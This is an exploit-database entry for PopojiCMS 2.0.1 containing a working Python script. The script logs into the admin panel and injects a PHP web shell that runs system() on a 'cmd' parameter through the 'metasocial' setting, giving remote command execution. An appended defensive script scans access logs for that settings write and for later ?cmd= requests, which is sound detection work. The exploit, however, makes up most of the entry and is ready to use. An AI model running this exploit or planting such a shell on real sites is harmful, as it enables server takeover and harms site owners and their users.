PopojiCMS 2.0.1 Remote Command Execution (RCE)

2024.06.17
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution
# Date: 14/04/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.popojicms.org/
# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
# Version: Version : 2.0.1
# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS

import requests
import time
import sys

def exploit(url, username, password):

    # Authenticate against the admin panel with the supplied credentials
    login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin"
    login_data = {"username": username, "password": password}

    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "Referer": f"{url}/po-admin/index.php"}

    session = requests.Session()
    login_response = session.post(login_url, data=login_data, headers=headers)
    if "Administrator PopojiCMS" in login_response.text:
        print("Login Successful!")
        time.sleep(1)  # wait 1 second
    else:
        print("Login Failed!")
        return

    # The "metasocial" setting accepts arbitrary content, including PHP code
    edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial"
    edit_data = {"meta_content": """<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>"""}
    edit_response = session.post(edit_url, data=edit_data, headers=headers)
    if "cmd" in edit_response.text:
        print("Your shell is ready:", url)
        time.sleep(1)
    else:
        print("Exploit Failed!")
        return

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Kullanım: python exploit.py sitename username password")
        sys.exit(1)

    url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    print("Exploiting...")
    time.sleep(1)
    print("Logging in...")
    time.sleep(1)
    exploit(url, username, password)
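A defender's view of the two requests the script above makes, as an added example that is not part of the original advisory or the exploit author's code: it scans web access logs for a POST to the metasocial settings endpoint and for later requests carrying a cmd query parameter. The combined log format, the one-hour correlation window and the sample lines are assumptions constructed for illustration; a legitimate settings change also produces the first alert, so treat it as a triage signal.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [14/Apr/2024:10:00:01 +0000] "POST /po-admin/route.php?mod=login&act=proclogin HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
203.0.113.7 - - [14/Apr/2024:10:00:03 +0000] "POST /po-admin/route.php?mod=setting&act=metasocial HTTP/1.1" 200 812 "-" "python-requests/2.31.0"
198.51.100.20 - - [14/Apr/2024:10:00:30 +0000] "GET /index.php?page=2 HTTP/1.1" 200 9034 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Apr/2024:10:01:10 +0000] "GET /?cmd=id HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
198.51.100.20 - - [15/Apr/2024:09:00:00 +0000] "GET /search?cmd=help HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

# client IP, timestamp, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": parts.path, "status": int(status),
            "query": parse_qs(parts.query, keep_blank_values=True)}

def find_suspicious(log_text, window=timedelta(hours=1)):
    """Return (kind, ip, time) alerts: metasocial writes, and ?cmd= hits that follow one."""
    alerts, last_write = [], None
    for rec in filter(None, map(parse, log_text.splitlines())):
        q = rec["query"]
        if (rec["method"] == "POST" and rec["path"].endswith("/po-admin/route.php")
                and q.get("mod") == ["setting"] and q.get("act") == ["metasocial"]):
            last_write = rec["time"]
            alerts.append(("metasocial_write", rec["ip"], rec["time"]))
        elif "cmd" in q and last_write and rec["time"] - last_write <= window:
            # A cmd parameter shortly after a settings write matches the script's usage
            alerts.append(("cmd_param_after_write", rec["ip"], rec["time"]))
    return alerts

if __name__ == "__main__":
    for kind, ip, when in find_suspicious(SAMPLE_LOG):
        print(when.isoformat(), ip, kind)
```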



Copyright 2024, cxsecurity.com

 
